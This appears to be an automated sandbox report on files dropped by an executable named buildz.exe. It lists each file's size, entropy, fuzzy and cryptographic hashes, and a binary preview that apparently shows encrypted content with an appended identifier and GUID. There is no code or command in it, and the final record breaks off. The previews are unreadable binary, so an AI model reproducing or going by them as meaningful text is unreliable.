                        Preview:<?xmlCD.2......f}5 .6*PX..82!=C .n.Z....t4...{sO.6....@,.U.\#w.,..].Y..E.B..4).o4....-4i.=.7..D.u0t&../A_..N...s.o(Q.C.p8.'70.Z...JW......k.6%.......71)B.'...B.yq.....$.}.......1{.@...2....I.R../...D+i.}C_....m.@g|Hj.h...M.;9.w..C.cV=Z.../..r..E..u..)..;....uk.K..k...&|}.8B:.G./.....q .3...f..........k64Y...x`W.M.v.s....%.0.....(UA.J.Xs).9S...:.#.1...Z0..OE.(......3..IU.....#.;..A.......5L...D....;A.~...('.l*.J.."]...)...L.,.....iv..R...8....C..XL.H..z`v.U.K..t.....J.$..t[..i.so......]......9..L.9.UUL&..._..T..._n.H>h!.......2.f ...;...R..de.8......B.e^.......@..DV..,Q.=BP./_.XT2d\{.NHS.....W.....#|.t..n..r-%(..=x...U..-K..XrI2.'.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):857
                        Entropy (8bit):7.736596617755663
                        Encrypted:false
                        SSDEEP:24:Iebeg4+FBbr4BB/hgwxRmC5eH9JgbRGbD:jaeFBbr4f/hgwW5iNUD
                        MD5:09A04C63A146E17B2BD0250DB2FF3397
                        SHA1:D67FADDF598BF84DE49099789EE860477091F240
                        SHA-256:2D66E6BF1B13DA7D5F7AEFF24688431B8EFC750BA96CDCE020CEACF785EDCA80
                        SHA-512:28E453CC981C4F3DAC499FD4204ABAF31EC6636DA4F5AF8B8CBEE1B4FE500C2E25DDEBD9321F43CB9C39235A613DE770C3E3EACB1D67C5CA073DF3DC846FCF05
                        Malicious:false
                        Preview:<?xmlg.P..:{.....o.8...n"f.A._V..'....s5.e?.Vqy..a.....B.4..W....C.xO.......bt.....N.ez7.b...g&.EBC...Uy%;ah..$.n.p.xYV.@.<*......Qj~.......{....AM...{.wQ...N.Y..9.>.><..Y..D..C.x.....+..$+@o$.....s.`.tu.^.Z.&P-..c..L.g..2..rw.1.m.Ad.Tc.........JXD..5.2u........$...|.S.`....2.v.(l.P.L}.....B..@....HC....DwW.........>....8..R,UwurX.8^.[.....X.5...G..0..L.RC..-).M._....q..Y..D..^...^$..O.d<_.8p...s.S.-... >-....f...*X.3..6.E.....I.M7...+r..ga/u.o..;A...?-S...N*i.y....M.8.#..D..&q...D...4_..1.......7...,....T....6m..e.8.}...]9..AH.......f...\25.....T .i...M.v...w.a..?...0...q8.A.......9.7r.Li....1{...GP.Pa..G..(....X#&c..."V._!..=.X.....X......MA:.4H.k..VW.bAF...J.^p......*Aw.}....R.l..t.. .......iZ... g.....<....f)...l.-2'......2..11B..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):886
                        Entropy (8bit):7.770019098384807
                        Encrypted:false
                        SSDEEP:12:/9xJuAlGQDvDQf/wh10eZ5poPpIn8eW+mvM79SISRo+PP3U1MdLhOPJu26Gcii9a:jdwLwBZzOin89lISe+Pq6KaGbD
                        MD5:E0902B63FA0354C202E63A5DE614AEF4
                        SHA1:0B94304C5A4B08A64F1E13D8DEE4A533A1242D38
                        SHA-256:737BF8AC58760304B521A36AD376A6525D084B34A1185B41642A9F078334954E
                        SHA-512:D0928C61208D02C1B761AE3B6E268FCD4F671A2E0F4ABD545C7DB8B64EFC22C2E0A217F9D13D7FB93B9B60E27FD4237093F26E2AF3D30522E1DE96E40C0361FE
                        Malicious:false
                        Preview:<?xml4p$.......D....4E..I.`.(....B....o.V...._.D..F.....7.l.?.Di,..:..+..L.e...d.. .R..M0......'.1.h@.Q.hv.j.K......{.B..$..$.}.R.^!.....U. ".^3y$v.?|~.`.Zp.....)u.....3.....pI;..`..._D..n}...47...3Xp.~..`..W..........[.d.iN.d.d.k.}c..Ft5..X....c.7D.y.a\....j..b_Z... H......9...:o=....W.7E..]8j..HT.p_..(..`.z1'...9.c.y._J...U.......(.1"h.g...#.T.......I....I[um...F..`...kR.>.....}..X...:..'.....UWG....%.U..5P.......=i$....b7"2./{N....../Sp..;.3.:J+..[./...{.Cu...4..,a...L.......%...R..w..z.n....f..H&>.0T,GY.."D. .'T..L.X..X.WZx.|q_....i.z.2...mVy..+F..7<#.gn...j..oy.iB.zB|X...O.....e<.R>]L.j.e.,|.t...'|.....D;.."s.....Y...[a....$.?.).6^y.*..)."Q.3C9.D.c3x.. .(..k.9y..`K..*..k......;..I...X.nQ....e....IG.l...%..u>.M...*.....\c$.U.(..t......Uj......yk....si.>_EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1003
                        Entropy (8bit):7.762671557777013
                        Encrypted:false
                        SSDEEP:24:EgUA3E04fFLX8mIpSo2sjfjdnY49NFXBxgYoV+O07GktGbD:5UU9aI7So2efBLNFXBSYoH0RUD
                        MD5:CA35C0003FCD6F888B259D50446CADE9
                        SHA1:1A11EF05F4E88F37E387A8C4110D2CBA2CEB8AD5
                        SHA-256:6AB72DA8095CA38D3089FE22D3D9AAA105C9834C20FC22AA3B4A03B99E972333
                        SHA-512:9DD872E847A84194992BD23CEEA96A36DCC697FBEE87853C9BBE8FCAC5B349C32435CEF00F458410CBF9E325A10061BA152708F0DB2359A80CCF573B7D957981
                        Malicious:false
                        Preview:<?xml.V6./J.8.b.m.."..63hQ...e...{.)az.........Z..\..~A@..98E&...z.q.&.tD..u.,f...ox...@."......0.6&...4..gBD..b.....".Cz..A.%.....lN.g...$.\*pN.]7..?.-^.<... N<.e.....P..>..&..`vq[0.y.+..F..9..0.'P.....W.j.(..vY../6..y...;^..../7vt.<W..,....k."......Z8...m)B.. /.lv.8...pva.G.mPnf..T..f(k.[..,...p...B.1f......I.<#.c.VL.Rz....@....u.M..tE8y..h.c..0..-i.C.2.%.......R...#.7....L...V.m..W....ip7f,`7v..!,..$J../R..2.?u...1.Y.J..o..n.X.@.d_Ma...._..X.....=...,..R.+....bGa....-.l.....s.x...vej.O..../.2.n.w...[.Pz.{.....i...1...R6.(...B.^x..5....(....},2.Q..1W.P...ev..........m.(;..]...>......W......|6=f.C..x-m>...l......hkik.>J......j...v..f.:.,#......l....%...8x..V..i.N,.k.6...j......4u.QF.>.k...k.HS..............tf......P(.#....Tk..'...PaVm..j....]9'Q..p.G......WJ.......r....<.."z...+.:..k..2..Dw_.....*.`.m.|.s..^.4n..3..(K@ev.M.Yn.}./.J..Ve...UH.W.cVBz..-Me......../.....>.dOEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):726
                        Entropy (8bit):7.633014033466708
                        Encrypted:false
                        SSDEEP:12:4BKjq8Rn+ZhnT8vE0XAtUULJDT7wfOzrXbxB+vCiOdnBNjKELe9baTQB7REjCyur:4BKX+bwvZX2NVDfwfOzhECiOdnbDe9Wu
                        MD5:52D033B3931F0215DEB3EA6E74F9549C
                        SHA1:5FA5AEDB28E9ACFEB036590A245D8C7E16CD35B2
                        SHA-256:721226E489729FB0264DD7352DBF07B7295859E78F34602106E4C4E617EDD580
                        SHA-512:1FA2893CE7CAA9BFCD7F7DD8D47E3B5FF8E52C9D364095C7CE83701EC7E583874072EDE5E5AE4A6AFB052445DF0FDE3AAF9DFCAEBD3EEEAEEF0962E0DA38646F
                        Malicious:false
                        Preview:<?xmlE }..WFmlQ!N.#.....5Z..L)...#..F.._.....&o....@.6Xo..3&..1\..JW .*...HZ....K...x.Z..*..\..;...5.?w"..~.pTB.g.C.I`.\....v.-.....H.....iQ>..(k.8.%C...>.NB.St....?./..1....@Kyo3v.;.E.q....j.....g..$.gvx.}..+...t.,.....SUr.a.\bq[Q.4).N...g[4c.:91..L.to.+.....>?o.....9)b2\.q..R..w...?...-...%....>."...1.R.k.V.1._.....9....1....j....kH0J.$......\R.R..<[p;.(.v..z..#...i,5.........R.......c.[{[.j~..-i9..>{..~...y.&./..L...RR..H>..$.....v.F.........L.S.k..IfF8...x...3.6K&,N.%.d....x...w...k8.T.P'.uTr..a.......K.%..#.0....}...2S=}..l@j..j..b.uE`.5.........e....n.$..\...R...2|J..D...}../..U9.W.F..K../..`mF.-.1"p.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):931
                        Entropy (8bit):7.735510258745663
                        Encrypted:false
                        SSDEEP:24:Ks1FueX8bQW5ykzWn54DAhiruYcHXivORGbD:Ks/UkW5LU4Demc3NRUD
                        MD5:2E6A854FB10552B060806AADCE8C032D
                        SHA1:D59623AC4CC148D0163EFFE9469CC1D21065E2F0
                        SHA-256:A702DFA9C448A384ECAF00B06F96311AF3279E31C95EAF20B9648235C4002DD9
                        SHA-512:2C8A93AD2E011AE926BCA0262571996199FA7BD1C80BD14E6F135232DDED7FDF71A2B291ABED3BAF765314459EB79980B41D32C31E7E388724707A56B28B1BB7
                        Malicious:false
                        Preview:<?xml..T.............#A{a.m..+\_.p_...Gp..,.f...V..~$/g..02..r>..R..b.L..hrz\.9Mm...../...1f.D 8.fjF.........9V....9..O=E... .K._w..yS......[..x....Uy.J...1,<..]>%....uE7.}?K.2.zM.-6.#z.*...>...DX..k...;7.).p...8.....{=.wl..0s..w...p..k..<....u?a.f#.p.W..q.4..T..dT9....[....lci2......@.L.zp.fl.....wA..U.W....y..V........cU.X,z...J..x..Vc.S....-..~.!..AU(M...{..>.><P/>...h'...n...N..f. JV....T,[m........2.........s"j}_.u....Z...."G.=..9...N0...2..9%#M..t..y.+...L..:$h&......CD..).+d.B.w.....'.....L.....2..../...4Nz3.m]G@.\!.:...iT.:*]..lR^u....</G.E *..U..s.q.F.......a...9.o@..x..p.p-.g.+..H)..Tc..........{...4.0.~.@..Yy8Kv..@. .....y5..........B@{..5s~@Z..M|.x......<..4......m(.B..wt..p.].M...)C=...........?..d....%..+.....\>C.f~D|.aX.y..~K;.g......U*....G;....e........Ny.r.dM.....>v...:......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):923
                        Entropy (8bit):7.734234206279586
                        Encrypted:false
                        SSDEEP:12:XwtwHmBPJP2zNr9QbyxHMq5TqdJW7A6iMtU+Fv62K/sx11ti/EEQT+Xu26Gcii9a:x2PIzNy2Hi/MA6ioi2x08nm8GbD
                        MD5:B804F6DD16788AF68C29ECAC7D961054
                        SHA1:A7AFBEF614219F65C5AA17468FFB439CDB6E9F7B
                        SHA-256:B27E7359A51AC3BC4AA0A7708A89F50D5BBA0B4380BFEF7ED56127E0EBC40DC5
                        SHA-512:D097DD32B90CC2F549F28BB29DDDAAD0F91866CF17D482DDCE3A6002E1D400100E8944651138ED0C69D2E635CE39C3B1312194301F97F08AD6395755A851BA38
                        Malicious:false
                        Preview:<?xml#.0.SD.........S....$,8....9f.-.14.~.y_..y.n...5{......t....<..niQ.+8laY.QZ...=.......M....8Qn.A..1.Q..L*`..d..I..V.;..r>..n.....B.8...s...H....<.6.m.Zz..&a..n.N...f...n..K.....DZ...Fb...{W5O."...|_..U.l.J...k....%..CV..~.B..qr0B....^Xh4.Nk*...7.j9..r...Y....<..^......C=.....E,.uG.d..-.'._...`...@...a.;u.J.......\.d)_-.L.t...fn.......F.F..u..?...&t7.....AQ<_..5..~......e.&...xX$.H..*.r`b.+jlg......9.9.k.o._.|.....]..C.9HlJ......m8...._..MCv``./....(...N...-.+...u...JR......`;u......m...o]M<.^..u.yL...]......L...D...}E. @...9..*.}.....<R..o....:...[\W.l.0+.W.Q.....F.......0.8z....G..2..4..{....|..E......Z.v..g2..:..._$.....W.O..aH..Xv.1....1Np%.............\.1.c.llt!3!...#..{.f....hQ.#Xj2\Np.........\...y....2N..\........zNb.....0..e1.l...d....lUy.\....v.......Dz..H..u?..ru.....EAEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1267
                        Entropy (8bit):7.83263816530466
                        Encrypted:false
                        SSDEEP:24:2tc85xQeRRplzQXZFVZY4YrIGW9g5qsdm0/C/T1RJ+FqDqxae299meNZk/HGbD:Q5SezjQx90qsdm0KTJ+cWY/9hNZk/HUD
                        MD5:4A0B8CB722FFF6B3E5D216FA832039AB
                        SHA1:72E2BD470EF2FD88048718596B124475283BA551
                        SHA-256:6BD8D994F424E10A28D525AB339AEFF6A3BDCC61B43B15CC1C78B189851BB32B
                        SHA-512:C67590AF4999B61CE185C91538FF17CCCD95CFF1202466C34F2C45E15C761400E5C69069F11499474B7D3E063715135F59F777C445FCC2E5CB4BCDBF23456062
                        Malicious:false
                        Preview:<?xml.gX..z.l4*d.".G.h ..\!...>}....k....m...;.:._S..)..6.v`........}.7...S.......X./k(D=`..."..L...)..e`.9..x.<.tX.....O..QR."*...M>....g.....G..........h|P!_:..T|.Y...1.L.....l..?D.....eQ..C..a.NjI....."..7NrUn.q.%....U=g.....7..f.d.<..\n.}......hGt.5..>..f.f..I5..h......Hv$s.dE.X`.iO>_.=.......e......q'\.....JB1.Ion..w....,'.s....._4...]....v.J..^.z..yG%f.J.3.B$~......{a.\wtN.Y..ZH.........c6.g...`.......cx...*nz....p~U......Q....4Pd2......r....+.#..$RE...%....]....eb.Y.5{......3..bC.k*.1.....m.3.7.I......\T...3F.q.....>......nr...;a#...n.].o}...+....=..Zc.5.c"f..s..F.....<v..17.....".z.....Z.fIo..R...m...IZ5_az...4so...~....ae....|.f......t..Cb2..h..:......?.&.S.7o..+....Y.BRmQ.^~.$.....|.nQ.).@............}...t.....G....U.kd....'.=y)}......d..t<.[M..i.A........_-ir^.e.D..Y'3.....x..FC.+.....Ut..C...|.,T,......Y%.:...s.q.7.u,EI....v-.A...1.o(2i!......71...>........*A.8...y..}..V.....,.U.2...R.VQ.MV...R._.... ;P..h../...=l..|....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.708683896822186
                        Encrypted:false
                        SSDEEP:12:lvNSVMXLTV7YzolrlLs+5/gDAsx8aABe6gEske989MUA42V6AL9Nv/26Gcii9a:lVSVsa8l2sgDR6pgEsr4N2MAJ1GbD
                        MD5:BC979A6BCE54A75DFAE4A93E1FEE082F
                        SHA1:D20C729084189F49F80E859F30F88FD1836D638E
                        SHA-256:CDF7CA9276BECBDF536BC18F02154C139A74404D98CAB24DD1D28F1DF2626F0B
                        SHA-512:46B2D53328058DBD9AB78207AF9BDCEF0D03227D4CAACDAF60074D11E6C094BC49F3959CCF3FEEBA29F798571B722990774374138AB02951C066CA7C401BDBA9
                        Malicious:false
                        Preview:<?xmlT./.........7S`.=U....<+h+...OZG..:.Q.]..KG.h.R....JkEw%..~..+-%.}...!..N....;...6....P^._.V.......aM..D..-.@......gRx%L..H..{....{......Ey%...+..l..z...e..#.......0.n...U......_".'W0SE....".r.RWB,y.Z.}"...^.).+]J.Bc.y...&..f........4..!0d.b.?'.\xL..B..MC.&..</b.:<>n.Rx.!.@....&...O1 ...<T....4.9,.(T.]..AG.....+..Y.m.d...!__...!z.L.....R..s...".%h.$.f.K..}.b.....P...r......b.D}.`.t.{.+.i....8vq....z.Ud...oA.S.P.O..yQ.lk*.......2c...N....o.q2...:..!.. .../b.....8...A..;.....WUFXh./N..D1A.24..g{#oc....>..'...3Nn..."...o.Y..)c...m>.6.(.\..8..k..n.z..n.R...4.)....&.g.U........|I.u....c....]........As.#....W.u|EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):723
                        Entropy (8bit):7.689845715695823
                        Encrypted:false
                        SSDEEP:12:0O4wZpC6SOgcVv0SCQ4olKQleeRloh0KlCVHzKAD26Gcii9a:TPvoOe8YpcuSGbD
                        MD5:1A68D52FE938DF2522CDF333FF7BA234
                        SHA1:D76699058EE7B15C2F39A33F98CC87D3A706FF2C
                        SHA-256:98FBD7CEF3D8D37BF3C322730B5035200789DB09BB24A2A1F4D7C7A50C385984
                        SHA-512:FA756F9F1C28FE52F0A27888B97D756567B4D9DC0FBC536DBC6A36665AAC3FF5A2E3239DABDA79E472C726982BE18F044261A70020BF978A0C6EEA2DBC0AE362
                        Malicious:false
                        Preview:<?xml..E..J.".0....v'.s...2(.n.Ag}.......\....A.m.|. Q7......WN.t.{...}*..A.a....V........=5...os.G....'kj.)C....]r..h].&.uq7..XI.,.^.tnO1M}........I.S.<$..B.a.........J]..U.U..z.<.....e.2..M.-..o.bn..8..eG=._JV.K..q.....*....0.@.G.V*u@od7...h.H..S;..9.L.....udv.;..{o)/.Y..\.Sc|......@6.r...A...r.p.....KKy..e.8w...U...9(....]..;.!7.?'.e'....~;#'.....N6.j...i..u.YO.......g...V.:..... .a?.....p.?....2..4....+..KE.$~].@q...H.6...c.BJ.....t.e......:^.M....R.S......r.t.4...9..#..\.W.\..r!.:.N..@.".|.y...}1.A..f.,.P.{{...>...i.....z#..Y.I.^N....T..E!..X.4.b.[...lB...S..J......$...D.,.0E].....K....*....`K.&.....#.s..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):817
                        Entropy (8bit):7.714195644059163
                        Encrypted:false
                        SSDEEP:24:mMAToCOMPJjX+HbZqnPq5CslIEJP4W5UUmtlzRGbD:mxbBr+Hb+2CwBmt5RUD
                        MD5:482EA1A8CBDAB58F57096F35ED76153B
                        SHA1:48C788563AD10920EF6CBB4897D644BDE0C91863
                        SHA-256:CC08FB25847415A0401F8CB7685426736EF07AD73A133DECCFFD366767193E9C
                        SHA-512:B67C5B0375456A60C63E2020E2DFC8C00621E9CBF00C1E1FA19B38A958287AB5BA9E2D32A58302A034CF4E61A8C8C6A6FAD98F1B204B1B1286F44831043601A4
                        Malicious:false
                        Preview:<?xml...n..v...I...8..3#........&...{.-y.^...{=.f?.0.T...w...A.....J.YX....0..B..S.,.../5~.]>........~g?.L..Z..OF..f..ov..iz..%.?M.w.^...%.Qt,=.........].RV.6...yL....l.Ka.a0..Q..t...3..j.....'.>e....'.*..3...%..._........5#.Y{..4...4.z.K$l.?........]...Y...~cD9......a.........p...5.)..4.e.;.d.-.!........v...V<._.....Nj..&qk....qy./J.:..Z..c^..c. _....[3..f@.d.n..S2.......S.%...t_j../?..<=.hyqq.Y<...BI;o.f...d....s..@.....AH.b.......3...w.l..A.'|7.=\.}p.R..^..!.H.m..f..Oc....../,..1..f}%...D..........0........I...9c;m...SoPY~!.H.6`9.P...h/&V...H|..?.gB.1@.;A...9.....q.38..e.:.9.Sh....s...........<.V.e#.5h-...%x;.J...u.Ht.....c.V.y..'.:..Z0..a'...g.]|.ki0.G..K.5@..+.....$......T.'.\y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.7060664700904224
                        Encrypted:false
                        SSDEEP:12:g2mgXREL9rQamVu8ZJc+c2ZYnLPaCFgYWgR3hC5RvVlAZWbvkyg+WrUYX26Gciik:gTSaBrQamVy+c3LyGflwAZwcigvGbD
                        MD5:AADA486BA393BFC4FA8CFA9A1E70AF88
                        SHA1:F3C635A45100168419C58843072AF96703F639B5
                        SHA-256:9924F9588238490B1CE93693F705EAFC8E30D52025F505F69C6C6A629A227EE9
                        SHA-512:690E938C97EED4E394D47149BB77817C1B11B690549FB1C25F70D4C9F949B206241C072CC12144CEB67EBF3A98928E648E98092E3F7DB0D17E103B101B15AE27
                        Malicious:false
                        Preview:<?xml.x...D...+.f.&.C...O..9r4....1I..2...;*.d..q.Pz;.o.l.@.....)/..9g...-f.#.o..[7M.>dV.n......`*$.M.O.fI.^F.0....gk..3...m.*..t.Gy...qt..6.....'Z.z}E..b.8..o..ag.g...?Er.)]k.t.....iYJ.5g..~.A....T.Gy...`..).t..xL.....@../7O..<.puJ...d.7#-.w....h.a c.Yo<.L..........xTL.9.!.z.MDEy?...o..zv..y/.m.*-P..,.K.;}?.n....sJe..^...C.85<VG0...Z.j...%...].U..B#=H.#...d.g.6...Y..R%w.y....R.8....g.4..d+e8....3U.^J.%baG^I. ....(b.\L...,..t.......t...|Ulx._.7.'o..XI.>.Q...../.=.Kro..4....e..h.`.P../...2@.c.#_.|....'4d..0..h>..T...&..q.r .zx..O........!.:....2...i..#d.x...u.gq....r..p)....L...|&.[......X....V.K.@..E....C.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):881
                        Entropy (8bit):7.719282243766543
                        Encrypted:false
                        SSDEEP:24:h80P3qvfxOM8vOeR2DKOW8d5mEpF9y2kpfZFGbD:ePfxOJ3qHkppfZFUD
                        MD5:F7ED5E37FB052EDEC4E745E24C9D781B
                        SHA1:B9AE91138C53726F6C023CEC9716B831F905FB87
                        SHA-256:73D51382F2877F7F67B8890A21B851DD3FA9635D62ABBD3449A39215C1218ACF
                        SHA-512:D275D1E2553E2AF5506D0E335419686C1E049BA14E262055C1A22DD6BF21F6E22C41D0A97F0C3872211E65BB12BBDECB1902851C87FCCC25D204B39ADEB23B13
                        Malicious:false
                        Preview:<?xml..A..e.PL....&7c'&...".a.k.p*n&.I`.e.D!3W....m..5..)..8.l....)..S..!...L.......Q...n..Y"(..az..2..@;......d7.,i....@..@n+...).1.....=.iywU.."."........u/_.^......;.=$.....pn}.....H.....v7.........<..hB.zo.0....Z6.. .z..I....S..n.2.Fz..4T.....f.K.M.S.u...Q'-......E.;]....}Cx..,......;...IU.q....,.....i?.iC......C.I+........SVs._..Z.d)...t.....X..Q+..LK..-b....\.....EN..Kh..;..)...S%..S...1.c.o...U._......)bs..k_.DUD.D...I$a..?z..<vR.d6..a.`../........SY.%&........c...j......`.'..6''.6<x..R.&?/O.....oy..qx>..[.......]........?.7&w.d.3+Y=.h.=1...Q..u..f..J..g.y.n.....y4..qw.R)...2.)......^)...t...1..vS.|.x.8.<.b......^.S8^...0..E...%q.....[.DPp*.^.W..._..c.....g.Er..k......y....e..Z*^4H(........U.i.....X././...._.v......M#.....\M.@..../......z...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.693944864010471
                        Encrypted:false
                        SSDEEP:12:mgZEavJBbjWYI6DhEFyk9SIa3++arolVEhTVWFwes8XCKwUD26Gcii9a:3vTbCYIQE8SSnO+aU/KTWHCK/rGbD
                        MD5:638587BACC0CD0282DB84AC323D5C1AD
                        SHA1:CFD465E68DE1DCB9BD39F59A447ADF83FE18650D
                        SHA-256:C6794B6EEB1ED90D2F47DFCC3149CBA22956B6127FF34402411F6BFEFC72E413
                        SHA-512:5547A09CBA8AE77383400BB771787E01DEC4EC3B5507CDC3A971FF9AE3F46D5D7096F89DA748F1B9AFE2EE6C0516301A07092254F858D54289E42763C37BDEF1
                        Malicious:false
                        Preview:<?xml.....R.e>...}.Z.M.y...?. 'Y7.POK._'.<S%*B5mV.k..U.9a^.....r......+^..#..4...j.F8..V....h.u.u.D...?..".;b..M$..V.BR.....Y.v.......j.k... 1......-.rB..>..fA....~...).o....?w.U.W.y..".Gy..w..v..O....._..\}.......i....z&.Rj..G.L.y..6..e]L%...i..._....q..\.!.L/& .....GK.x.Xo.......`.u..G..x.....g.X@.eB...Ub7r.(X..%y.G>..2......#[..O..4..8..e.....~2.!_1.w...%... L.<...:x..I.....5.2s]...&m.P>..q.....<.^....g0r.........G..TI4.9).z..J.<t2.FX.p?..JP.$8..6..S...RF*.^....p...g.e#..v......Wp]...u...'.&..G..>...........^......m}.W..?36.AU.......#No...~Fi.....b....U........%..YM.....w0.N...x*.yX..X........[.....g0.f..McEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1421
                        Entropy (8bit):7.815192114340952
                        Encrypted:false
                        SSDEEP:24:721AdpJUMA4Gff9JvL9ElFTrBzL+9zNBavUw5R27SSnsyEvpSXpK6BKQmmiyIGbD:7R2MA4GfFJT9Erk9yvxriSssyEoBBKQd
                        MD5:7FAA5B26C8FA8C7B90FFAD566D7816C6
                        SHA1:8DDD9BFAD23BD9133378E5AF4426AA0B17E53D11
                        SHA-256:74A99FB6AF83A0D447B9EDBCD0AFF94E5D180BAE0E557FD77BAD0521F8C7CDB2
                        SHA-512:4AE5B173C5CDC0E397A359F7030D3FA7EEA0FD59B8AFD25C94171353CE7262C4DA8D10678E04D0143908EC7CA7835D5D18FC6FEE91A1B435C731A761226059C8
                        Malicious:false
                        Preview:<?xml#...{.!.<.K...d........1r..#im.Z..Z=...c.9V>rBI.N/e.aCts.....`y.......R.g..a.~.G..a....r..W.....~+gM......`CL....7.....?{.....D#aaiD.~.'...AF'....5....,.JL1@...@..[4+. ..`....crf[..e..)ap..[.L.......R)P...u...>.f.\m6u?.w%,....c?...Ho......&.....-....+B.4A.".on-T....Z...oj..\.S9....p.!..1C.. d.v.Q`._..o.R..Y.....C..Q./-..f.P_Q#...u.Bi..u....2.....&....4....=..0...K.{...?%[...h1bL.....r.a.mG.B........?k,S[.,.b...~......F..[!XC..-....;...E%1J...q+AA*.Z.(!.hT|....l.Cq?.|.....ne.....W.&.aN.w8......ak..k..3N./....!|8.:F2S....f..o.....|....../(u..L.#......{..H.}../.[......S.0......|...`...%vP;.%.='.5.c'.8..?(.Du...23.....JJ'..^.M.....h68).p..".2.u.h..{f4.*.m]...;@..,..>H...B.30.]v.......9p._|..........f#.m|v.,....y.!..o&...]......>....>x1....a......N+,....k........XK.7U..P.]!.7..%..0..I0".........).1....#...:z.I....xk1._q=S..8+I......Y.!.R(+...l.Z....u.-....S.RhJ7(...":.#..s.,.....g(.9.-.t........1..y...D....F.q...p..$......^...%..kj
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1171
                        Entropy (8bit):7.845817870994093
                        Encrypted:false
                        SSDEEP:24:u0Wi5DUmd8IOGX3qQgaGyRaV3Fx63Zh+cjNvURwEF+8fdf3uGbD:u0Wi5Djuyqgvgn6a+Jwo8peUD
                        MD5:4F5EB85F59A05C8D69CF8E5A21931580
                        SHA1:AE8DDD31E6C7B6530451DAED55904C935707DC57
                        SHA-256:5D7D43CE6F225B6A4941EBC65F044CC27B7D9ACD2A7437C922DC092E8A305138
                        SHA-512:BF3FE1E249A4FC926F90A49E55172BFE852AEEAF3C6479908C0A042EF346AFA82B4718576DF9FF2B46B2987CA582916B7C63FF6381985DDC7AFBA88C0DA81893
                        Malicious:false
                        Preview:<?xml...........Z....{.md*....~.x.Ql...Z......5.j.<.u(..aN.._.l.NW.?G.....#.)....x......6/.F..a|AJ.8.&...t/..U....0&|...g.CE...u)p...=....A9sG..:..;I'y...@......X.=...~.V..2.iena3..Vz.,r.R...J..?.DX.....p,.....=..].].l`..."Q.Ta......U.e.=.?.6.P..._}."S.1..@.+..Vk....H..d..l...a.^....L.Ih.....o/k3...>.E~pX.. u}.=>tp..y..|......E....v_&Z].B.T.9.%......B.A.t..`....'N.#.."(fx....:..c...T...0.....<Z.S..r....Y."..#P!b..+w.....9o^.{8.'......jT.w&{oo'.!.....'..s..J....4..i..i.U...<...#.....$..%..p.G.rz_....."2V.Ur ..=.}S.7.'w.qH.K....#...R.5...u9......V....T...>Q..H.V.....*.+......[...Y......x....T.*...2.Rw.....f.81....b_.8...._...>2..c..9..q..+..r&..Z3........I...E.k...`;O...aq.k.I..&..$..C.7..g...1.~.uF....zZ.bR...2....7s..=!j..Xc.. .#zD)....5.}....{M.....[..' .RS...A$.....S........$..m.......p.;%......T .A!.....x.7......H.....e..X......g..b..i ..{....L..(`...H...(..fh.$...Y^es.,#... .........LM....A.:...2k....q.%*;.&].C.?a...q.S._....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1176
                        Entropy (8bit):7.822651279717159
                        Encrypted:false
                        SSDEEP:24:8Eca5ErJPXdcN1gRzJBwmiOw3jBZrBv+yr9sm6pn2imYSZu09NfvPC4EHBM5/JGX:Rcau1SNkz3wmiJjB9RWp2iMZvNE+LUD
                        MD5:683EB1C2A53232CACE82CFB821C42FC5
